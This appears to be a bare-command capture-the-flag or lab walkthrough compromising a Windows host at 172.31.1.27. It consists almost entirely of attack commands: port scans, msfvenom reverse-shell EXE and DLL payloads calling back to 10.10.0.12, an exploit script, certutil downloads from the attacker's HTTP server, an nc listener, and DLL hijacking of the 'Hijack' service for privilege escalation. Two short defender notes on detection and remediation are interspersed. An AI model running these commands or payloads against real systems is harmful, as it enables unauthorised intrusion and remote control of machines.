nmap -A -p- -oA output 172.31.1.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.27 -oG allPorts

Pasted image 20210705082604.png

extractPorts allPorts

Pasted image 20210705082630.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.27 -oN targeted

Pasted image 20210705083017.png

nmap --script http-enum -p80 172.31.1.27 -oN webScan

Pasted image 20210705084146.png

whatweb 172.31.1.27:80

Pasted image 20210705084235.png

cat targeted

Pasted image 20210705084314.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_hijack.exe

Pasted image 20210705084931.png

Pasted image 20210705105202.png

ruby 44449.rb 172.31.1.27

python3 -m http.server 8888

certutil.exe -urlcache -split -f "http://10.10.0.12:8888/reverse_hijack.exe" reverse_hijack.exe

nc -lvnp 4444

Pasted image 20210705113403.png

cd C:\Users\jack\Desktop\

file access.txt

Pasted image 20210705113707.png

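certutil.exe -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Defender note: certutil.exe run with -urlcache and -f against an HTTP URL is a well-known living-off-the-land download pattern, and it appears three times in this walkthrough. Process-creation logging that records command lines (Windows event 4688 or Sysmon event 1) is enough to alert on it.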

Pasted image 20210705113840.png

cd C:\Program Files\Hijack\Libraries

sc query Hijack

Pasted image 20210705115659.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f dll -o Custom.dll

Pasted image 20210705120354.png

cd Program Files\Hijack\Libraries

certutil.exe -urlcache -f http://10.10.0.12:8888/Custom.dll Custom.dll

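sc start Hijack

Defender note: the steps above only work if the low-privileged shell can write into C:\Program Files\Hijack\Libraries and is allowed to start the Hijack service, which presumably loads Custom.dll from that directory; the actual permissions are in the screenshots, not in this text. The fix is to remove non-administrator write access from the service's directories and restrict who may start or stop the service. File-creation monitoring (for example Sysmon event 11) for new DLLs under Program Files covers detection.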

Pasted image 20210705135611.png
